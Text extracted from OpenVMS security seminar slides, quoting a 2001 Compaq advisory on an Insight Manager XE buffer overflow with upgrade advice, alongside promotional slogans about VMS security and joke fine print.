http://manson.vistech.net/ht_root/Hack-VMS-faq Doc cypher VMS FAQ

filename\location

Patch mailing listhttp://www.support.compaq.com/patches/mailing-list.shtml

Subject: [Advisory] SSRT0766 Potential Buffer Overflow for Compaq Insight Manager XE (only)Date: Mon, 29 Oct 2001 15:28:54 -0700From: "Boren, Rich (SSRT)" <Rich.Boren@COMPAQ.com>Reply-To: "Security Patch Mailing List" <security@list.support.compaq.com>To: "Security Patch Mailing List" <security@list.support.compaq.com>

-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1

NO RESTRICTION FOR DISTRIBUTION PROVIDED THE ADVISORY REMAINS INTACT

TITLE: (SSRT0766) Potential Security Vulnerability Compaq Insight Manager XE Software

SOURCE: Software Security Response Team U.S. Compaq Computer Corporation *Reference SSRT0766* * x-ref SSRT0758*

Date: October 29, 2001

(c) Copyright 2001 Compaq Computer Corporation. All rights reserved.

PATCHES SUPERSEDED BY THIS ADVISORY: None

"Compaq is broadly distributing this Security Advisory in order to bring to the attention of users of Compaq products the----

Summary

Compaq Management Software products undergo rigorous qualityassurance processes to ensure that they meet the highestpossible standards for security, reliability and usability.In line with this commitment, Compaq recently uncovered apotential buffer overflow security vulnerability in itsSNMP and DMI support within Compaq Insight Manager XE.This vulnerability has the potential to enable unauthorizedusers to execute code at an administrator level through theexploitation of a buffer overflow. Compaq has addressedthis issue with version 2.1c of Compaq Insight Manager XEand the recently announced Compaq Insight Manager 7.Compaq strongly recommends that customers upgrade toversion 2.1c or Compaq Insight Manager 7.

Compaq strongly recommends that management agents and CompaqInsight Manger XE be deployed only on private networks and notused on the open Internet or on systems outside the bounds ofthe firewall. The implementation of sound security practices,which includes disabling external access to Compaq managementports, should help protect customers from external maliciousattacks. Compaq also recommends that strong password standardsare used and that passwords are changed regularly.

filename\location

OpenVMS Security Seminar

QA&

filename\location

VMS when computer failure is not an option!

Mitnick can’t hack VMS

Bin Laden can’t take out VMS

And Not One of 70,000+ the viruses ever to roam the internet has ever infected or corrupted an OpenVMS systems.

That’s why after 25 years, companies still use and Trust OpenVMS.

And now it’s your move for computer security…

filename\location

filename\location

The Fine Print

Copyright 2002 Hewlett Packard Corporation All rights reserved.

While Compaq believes the information included in this presentation is correct as of the date produced, it is subject to change without notice.

All trademarks and registered trademarks are the property of their respective holders. Itanium™ and IA-64™ are trademarks of Intel.

Presentation void where taxed or prohibited by law.

Recommended for technical and engineering ranks ages 12 and up. Ask for special pointy-haired-boss toy.

Do not taunt Happy Fun Ball.

Known Glaze-on hazard, please keep this and all other similar presentations away from known-sensitive members of engineering, marketing and management.

filename\location